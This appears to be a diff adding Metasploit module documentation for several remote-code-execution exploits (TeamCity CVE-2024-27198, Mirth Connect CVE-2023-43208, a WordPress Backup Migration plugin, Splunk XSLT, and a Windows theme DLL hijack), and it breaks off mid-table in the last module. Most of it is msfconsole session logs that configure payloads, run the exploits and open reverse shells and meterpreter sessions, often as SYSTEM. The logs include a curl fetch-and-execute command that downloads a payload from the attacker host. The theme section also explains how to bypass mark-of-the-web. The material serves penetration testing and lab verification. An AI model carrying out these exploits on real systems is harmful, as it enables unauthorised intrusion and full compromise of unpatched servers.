+[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2022.
+[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.OFNzM2pkZW5IMXp0V2stY2VqWEtOZkpoOW9Z.ZWU4Y2I2ODgtZDQzMS00ZjE5LTk5NzgtNGY5YzMwM2VmMjcx
+[*] Uploading plugin: jWHObFbu
+[*] Deleting the plugin...
+[*] Deleting the authentication token...
+[*] Command shell session 2 opened (192.168.86.42:4444 -> 192.168.86.68:53110) at 2024-02-23 14:20:35 +0000
+[!] This exploit may require manual cleanup of 'C:\TeamCity\webapps\ROOT\plugins\jWHObFbu' on the target
+[!] This exploit may require manual cleanup of 'C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_jWHObFbu' on the target
+[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\jWHObFbu' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.20348.1547]
+(c) Microsoft Corporation. All rights reserved.
+-----
+          
+
+c:\TeamCity\bin>whoami
+whoami
+nt authority\system
+
+c:\TeamCity\bin>
+```
+
+### Windows Command
+
+Note: Ensure the target is a Windows target by confirming via the `check` command.
+
+Note: Ensure the `FETCH_COMMAND` is set to a suitable value, such as `CERTUTIL`.
+
+Note: Ensure the `FETCH_WRITABLE_DIR` is set to a suitable value, such as `%TEMP%`.
+
+```
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 2
+target => 2
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload cmd/
+Display all 623 possibilities? (y or n)
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options
+
+Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.68    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              8111             yes       The target port (TCP)
+   SSL                false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                yes       The base path to TeamCity
+   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      qaZbVnKb         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > check
+[+] 192.168.86.68:8111 - The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2022.
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2022.
+[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.ZHpiZmNJMlB1b2Zqam5NSkw0bk1JS1hFdlZz.MjVjZDQ3YjEtODM2YS00Y2I1LWE3ODEtMzUzMTgzMDc4NjA3
+[*] Uploading plugin: RzeS0eJP
+[*] Deleting the plugin...
+[*] Sending stage (201798 bytes) to 192.168.86.68
+[*] Deleting the authentication token...
+[+] Deleted C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_RzeS0eJP
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.68:53113) at 2024-02-23 14:21:43 +0000
+[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\RzeS0eJP' on the target
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-CMULENHFCK7
+OS              : Windows Server 2022 (10.0 Build 20348).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > pwd
+c:\TeamCity\bin
+meterpreter > 
+```
+
+### Linux Command
+
+Note: Ensure the target is a Linux target by confirming via the `check` command.
+
+Note: Ensure the `FETCH_COMMAND` is set to a suitable value, such as `CURL`.
+
+Note: Ensure the `FETCH_WRITABLE_DIR` is set to a suitable value, such as `/tmp`.
+
+```
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOSTS 192.168.86.43
+RHOSTS => 192.168.86.43
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > check
+[+] 192.168.86.43:8111 - The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 3
+target => 3
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp 
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set FETCH_WRITABLE_DIR /tmp
+FETCH_WRITABLE_DIR => /tmp
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options
+
+Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              8111             yes       The target port (TCP)
+   SSL                false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                yes       The base path to TeamCity
+   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      cWStJXIvdtmM     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   3   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
+[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.NVAxemdUTVFnSlp4Um1jdkN5Yi12dk1wNkJR.NTIyNTA1NjgtOWM3Zi00YzdiLTkzMTEtYTc2Y2ZkZjRjYTVl
+[*] Uploading plugin: CyGZ1ME5
+[*] Sending stage (3045380 bytes) to 192.168.86.43
+[*] Deleting the plugin...
+[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.43:55572) at 2024-02-23 14:24:37 +0000
+[*] Deleting the authentication token...
+[!] This exploit may require manual cleanup of '/opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_CyGZ1ME5' on the target
+[!] This exploit may require manual cleanup of '/home/teamcity/.BuildServer/system/caches/plugins.unpacked/CyGZ1ME5' on the target
+
+meterpreter > getuid
+Server username: teamcity
+meterpreter > sysinfo
+Computer     : 192.168.86.43
+OS           : Ubuntu 22.04 (Linux 6.5.0-15-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/opt/TeamCity/bin
+meterpreter > 
+```
+
+### Unix Command
+
+This target is suitable for targeting Linux, OSX, or any of the unofficially supported platforms such as
+Solaris, FreeBSD and so on.
+
+Note: Ensure the target is a Unix-like target by confirming via the `check` command.
+
+```
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 4
+target => 4
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options
+
+Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS             192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT              8111             yes       The target port (TCP)
+   SSL                false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI          /                yes       The base path to TeamCity
+   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
+   VHOST                               no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   CreateSession  true             no        Create a new session for every successful login
+   LHOST          eth0             yes       The listen address (an interface may be specified)
+   LPORT          4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   4   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > check
+[+] 192.168.86.43:8111 - The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
+msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
+[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.ME9Xa2xIMDhSYmtxTVBMaThGWDdObVJaakZ3.MDdhNDM0NzktYWM3ZC00NzAzLTk4ZmUtNjVlMzQ3MGMwOGIz
+[*] Uploading plugin: 4V9kOD1D
+[*] Deleting the plugin...
+[*] Deleting the authentication token...
+[+] Deleted /opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_4V9kOD1D
+[+] Deleted /home/teamcity/.BuildServer/system/caches/plugins.unpacked/4V9kOD1D
+[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.43:44878) at 2024-02-23 14:27:04 +0000
+
+id
+uid=1002(teamcity) gid=1002(teamcity) groups=1002(teamcity)
+uname -a
+Linux teamcity-ubuntu-test 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/opt/TeamCity/bin
+```
@@ -0,0 +1,121 @@
+## Vulnerable Application
+A vulnerability exists within Mirth Connect due to its mishandling of deserialized data. This vulnerability
+can be leveraged by an attacker using a crafted HTTP request to execute OS commands within the context of the
+target application. The original vulnerability was identified by IHTeam and assigned CVE-2023-37679. Later,
+researchers from Horizon3.ai determined the patch to be incomplete and published a gadget chain which bypassed
+the deny list that the original had implemented. This second vulnerability was assigned CVE-2023-43208 and was
+patched in Mirth Connect version 4.4.1. This module has been tested on versions 4.1.1, 4.3.0 and 4.4.0.
+
+### Setup (Linux with Docker)
+
+1. Run the application in docker: `docker run --name mirth-connect --rm -d -p 8443:8443 nextgenhealthcare/connect:4.4.0`
+
+### Setup (Windows)
+
+1. Download the desired release from the [GitHub page][1]
+2. Install a Java runtime
+3. Install Mirth Connect
+    1. Accept all default values for every stage of the installation
+
+## Verification Steps
+
+1. Follow the steps from the Setup section to create a test instance
+2. Start msfconsole
+3. Run: `use exploit/multi/http/mirth_connect_cve_2023_43208`
+4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+5. Run the module
+
+## Options
+
+## Scenarios
+
+### Mirth Connect 4.4.0 in Docker
+
+Note that Python is not available in the docker container, so no Python payloads will work.
+
+```
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set TARGET Unix\ Command 
+TARGET => Unix Command
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set PAYLOAD cmd/linux/http
+Display all 106 possibilities? (y or n)
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > exploit
+
+[*] Command to run on remote host: curl -so /tmp/PFYkPcUX http://192.168.159.128:8080/jvE_gjDKxuQo86-91TitNQ; chmod +x /tmp/PFYkPcUX; /tmp/PFYkPcUX &
+[*] Fetch Handler listening on 192.168.159.128:8080
+[*] HTTP server started
+[*] Adding resource /jvE_gjDKxuQo86-91TitNQ
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected target version: 4.1.1
+[+] The target appears to be vulnerable. Version 4.1.1 is affected by CVE-2023-37679.
+[*] Executing cmd/linux/http/x64/meterpreter/reverse_tcp (Unix Command)
+[+] The target appears to have executed the payload.
+[*] Client 192.168.159.128 requested /jvE_gjDKxuQo86-91TitNQ
+[*] Sending payload to 192.168.159.128 (curl/7.74.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 192.168.159.128
+[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.128:49360) at 2024-01-26 17:11:37 -0500
+
+meterpreter > getuid
+Server username: mirth
+meterpreter > sysinfo
+Computer     : 10.0.2.100
+OS           : Debian 11.4 (Linux 6.6.12-200.fc39.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > pwd
+/opt/connect
+meterpreter >
+```
+
+### Mirth Connect 4.4.0 on Windows Server 2019
+
+```
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set TARGET Windows\ Command 
+TARGET => Windows Command
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(multi/http/mirth_connect_cve_2023_43208) > run
+
+[*] Powershell command length: 4418
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected target version: 4.4.0
+[+] The target appears to be vulnerable. Version 4.4.0 is affected by CVE-2023-43208.
+[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
+[+] The target appears to have executed the payload.
+[*] Sending stage (201798 bytes) to 192.168.159.10
+[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.10:60705) at 2024-01-26 17:10:20 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : DC
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : MSFLAB
+Logged On Users : 13
+Meterpreter     : x64/windows
+meterpreter > pwd
+C:\Program Files\Mirth Connect
+meterpreter > 
+```
+
+[1]: https://github.com/nextgenhealthcare/connect/releases
+
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7).  The vulnerability is
+exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint.
+
+The vuln makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend
+bytes to a string by continuously chaining character encoding conversion. This allows an attacker to prepend
+a PHP payload to a string which gets evaluated by a require statement, which results in command execution.
+
+### Setup 
+
+Spin up a Wordpress instance by running `docker-compose up` in the same directory as the `docker-compose.yml` file below:
+```
+version: "3"
+# Defines which compose version to use
+services:
+  # Services line define which Docker images to run. In this case, it will be MySQL server and WordPress image.
+  db:
+    image: mysql:5.7
+    # image: mysql:5.7 indicates the MySQL database container image from Docker Hub used in this installation.
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: MyR00tMySQLPa$$5w0rD
+      MYSQL_DATABASE: MyWordPressDatabaseName
+      MYSQL_USER: MyWordPressUser
+      MYSQL_PASSWORD: Pa$$5w0rD
+      # Previous four lines define the main variables needed for the MySQL container to work: database, database username, database user password, and the MySQL root password.
+  wordpress:
+    depends_on:
+      - db
+    image: wordpress:latest
+    restart: always
+    # Restart line controls the restart mode, meaning if the container stops running for any reason, it will restart the process immediately.
+    ports:
+      - "8000:80"
+      # The previous line defines the port that the WordPress container will use. After successful installation, the full path will look like this: http://localhost:8000
+    environment:
+      WORDPRESS_DB_HOST: db:3306
+      WORDPRESS_DB_USER: MyWordPressUser
+      WORDPRESS_DB_PASSWORD: Pa$$5w0rD
+      WORDPRESS_DB_NAME: MyWordPressDatabaseName
+# Similar to MySQL image variables, the last four lines define the main variables needed for the WordPress container to work properly with the MySQL container.
+    volumes:
+      ["./:/var/www/html"]
+volumes:
+  mysql: {}
+```
+
+Download the vulnerable Backup Migration plugin: `https://downloads.wordpress.org/plugin/backup-backup.1.3.7.zip`.
+Navigate to `http://localhost:8000` and you'll be redirected and asked to setup the WordPress site. This includes 
+setting a username, password, email address for the admin user etc. Once the setup is complete login as the newly created
+admin user and via the options on the left side of the screen navigate to the `Plugins` and select `Add New`. Upload the
+`backup-backup.1.3.7.zip` file. You should now see `Backup Migration` in the list of Plugins, select `Activate` on the
+plugin. You should now have a vulnerable instance running. 
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use `
+1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
+1. Run the module
+1. Receive a Meterpreter session in the context of the user running the WordPress application.
+
+## Scenarios
+### Backup Migration Plugin version: 1.3.7 (Containerized WordPress Version 6.0)
+```
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > set rport 8000
+rport => 8000
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > set lhost 192.168.123.1
+lhost => 192.168.123.1
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > options
+
+Module options (exploit/multi/http/wp_backup_migration_php_filter):
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   PAYLOAD_FILENAME  ONxu.php         yes       The filename for the payload to be used on the target host (%RAND%.php by default)
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS            127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT             8000             yes       The target port (TCP)
+   SSL               false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI         /                yes       The base path to the wordpress application
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.123.1    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/wp_backup_migration_php_filter) > run
+
+[*] Started reverse TCP handler on 192.168.123.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.0
+[+] Detected Backup Migration Plugin version: 1.3.7
+[+] The target appears to be vulnerable.
+[*] Writing the payload to disk, character by character, please wait...
+[*] Sending stage (39927 bytes) to 192.168.123.1
+[+] Deleted L
+[+] Deleted ONxu.php
+[*] Meterpreter session 3 opened (192.168.123.1:4444 -> 192.168.123.1:56224) at 2024-01-11 12:17:34 -0500
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 856d06702f34
+OS          : Linux 856d06702f34 6.5.11-linuxkit #1 SMP PREEMPT_DYNAMIC Wed Dec  6 17:14:50 UTC 2023 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,109 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+The vulnerability affects versions 9.0.x prior to 9.0.7 and 9.1.x before 9.1.2.
+The exploit takes advantage of a flaw in the XSLT transformation functionality of Splunk Enterprise
+and requires valid credentials to be executed successfully, with the default credentials often being admin:changeme.
+
+Upon successful exploitation, the attacker is able to execute code with the same privileges as the Splunk service user.
+Typically, this user is 'splunk' and the resulting shell will have permissions associated with this user account,
+which may vary depending on the specific environment and configuration of the Splunk service.
+
+## Verification Steps
+1. **Start Metasploit**: Launch `msfconsole` in your Metasploit framework.
+2. **Select the Module**: Use the module with the command `use exploit/unix/http/splunk_xslt_authenticated_rce`.
+3. **Disable AutoCheck**: Optionally, you can disable the automatic vulnerability check with `set AutoCheck false`.
+4. **Execute the Exploit**: Use the `exploit` command to run the exploit.
+
+## Scenarios
+```
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > options
+
+Module options (exploit/unix/http/splunk_xslt_authenticated_rce):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   PASSWORD         changeme         yes       Password for Splunk
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RANDOM_FILENAME  gWQgBqnz         no        Random filename with 8 characters
+   RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
+                                               loit.html
+   RPORT            8000             yes       The target port (TCP)
+   SSL              false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME         admin            yes       Username for Splunk
+   VHOST                             no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      eXHMuZOtzdPG     no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > set rhosts chocapikk.lab
+rhosts => chocapikk.lab
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Successfully authenticated on the Splunk instance
+[+] The target appears to be vulnerable. Exploitable version found: 9.1.1
+[+] Successfully authenticated on the Splunk instance
+[*] Extracting CSRF token from cookies
+[+] CSRF token successfully extracted: 4066849599386392852
+[+] Malicious file uploaded successfully
+[*] Sending job search request to /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
+[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701424044.745/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701424043.744/gWQgBqnz.xsl
+[+] XSLT transformation triggered successfully
+[*] Executing payload at /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
+[+] Payload executed successfully
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:60690) at 2023-12-01 10:47:25 +0100
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Red Hat Enterprise Linux 8 (Linux 6.4.10-060410-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+### Exploitation Process
+1. **Authentication**: The module authenticates using provided credentials.
+2. **CSRF Token Extraction**: Extracts a CSRF token from the Splunk server for subsequent requests.
+3. **Malicious File Upload**: Uploads a malicious XSL file to the server.
+4. **Triggering XSLT Transformation**: Initiates an XSLT transformation to execute the payload.
+5. **Executing Payload**: Executes the payload, resulting in a reverse shell or similar access.
+
+### Creating a Vulnerable Splunk
+
+```
+docker run -p 8000:8000 -e "SPLUNK_PASSWORD=Password^" -e "SPLUNK_START_ARGS=--accept-license" -it splunk/splunk:9.1.1
+```
+To create a vulnerable user, login with admin, then browse:
+settings > users > New User
+    Create a new user with the 'user' and 'splunk-system-role' role
+
+### Expected Results
+- This exploit requires valid credentials for successful execution.
@@ -0,0 +1,143 @@
+## Description
+
+There exists a time of check to time of use vulnerability in the way Windows 11 loads msstyles files when they are
+loaded via a theme file. When a user opens a theme which references an msstyles file with a `PACKME_VERSION`
+of 999, the process will check for the presence of the msstyles file appended with "_vrf.dll".  If the file is found,
+the process will open the file to check for a signature.  If the signature is valid, the process closes the file and
+then loads it. By closing the file after the check and before loading it, we can feed a legitimate signed dll to the
+check read, and then substitute a malicious dll for the second, resulting in the process loading our dll and executing
+arbitrary code.
+
+To control this race condition, we implement a UNC path pointing back to an SMB server we control that uses the type
+of request issued by the SMB client to dictate the file served to it; we serve a signed Microsoft Binary when the
+verification takes place, but serve a payload dll when the host attempts to load the file.
+
+Because the PACKME_VERSION must be 999 and licinsing limits our ability to include a microsoft binary in Metasploit, 
+this module includes a tool to take a normal windows aero.msstyles file and give it the required PACKME_VERSION.
+As the aero.msstyles file is also a signed binary, we can use it as both the msstyles file and the legitimate signed
+dll file.  This will fail if the msstyles file is already altered for this exploit.  For this example, we used the
+aero file located in `C:\Windows\Resources\Themes\aero\` on a stock Windows 10 x64 installation.
+
+As a final step, a user may convert the resultant theme file into a themepack file by using the linux command
+`lcab exploit.theme exploit.themepack`
+By converting this into a themepack file rather than a theme file, it circumvents the "mark of the web" and will no
+longer result in a security warning dialog box before opening.
+
+## Vulnerable Application
+
+Windows 11
+
+## Verification Steps
+
+1. `./msfconsole`
+2. `set payload windows/x64/meterpreter_reverse_tcp`
+3. `set LHOST <IP>`
+4. `set LPORT <PORT>`
+5. `set STYLE_FILE` <PATH_TO_AERO_FILE>
+6. `set DisablePayloadhandler false`
+7. `run`
+8. [OPTIONAL] Convert the theme file to a themepack file with the Linux command `lcab exploit.theme exploit.themepack`
+9. Copy theme or themepack file over to target.
+
+## Options
+
+### STYLE_FILE
+
+This file must be a signed msstyles file and serves 2 purposes:
+1. We adjust this msstyles file to have the required PACKME_VERSION and serve it as part of the exploit.
+2. As the msstyles file is an executable dll, we also serve it as the legitimate signed file to pass the verification
+   before serving the payload dll.  A file of this type is located on Windows 10 hosts under
+   `C:\Windows\Resources\Themes\aero\aero.msstyles`
+.
+
+### STYLE_FILE_NAME
+
+This is the name of the style file added to the theme file we create.
+
+### THEME_FILE_NAME
+
+This is the name of the theme file created by the exploit to send to the target host.
+
+## Scenarios
+
+### Windows 11
+
+```
+msf6 > use exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146
+[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > show options
+
+Module options (exploit/windows/fileformat/theme_dll_hijack_cve_2023_38146):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   SHARE                             no        Share (Default Random)
+   SRVHOST          0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the loc
+                                               al machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT          445              yes       The local port to listen on.
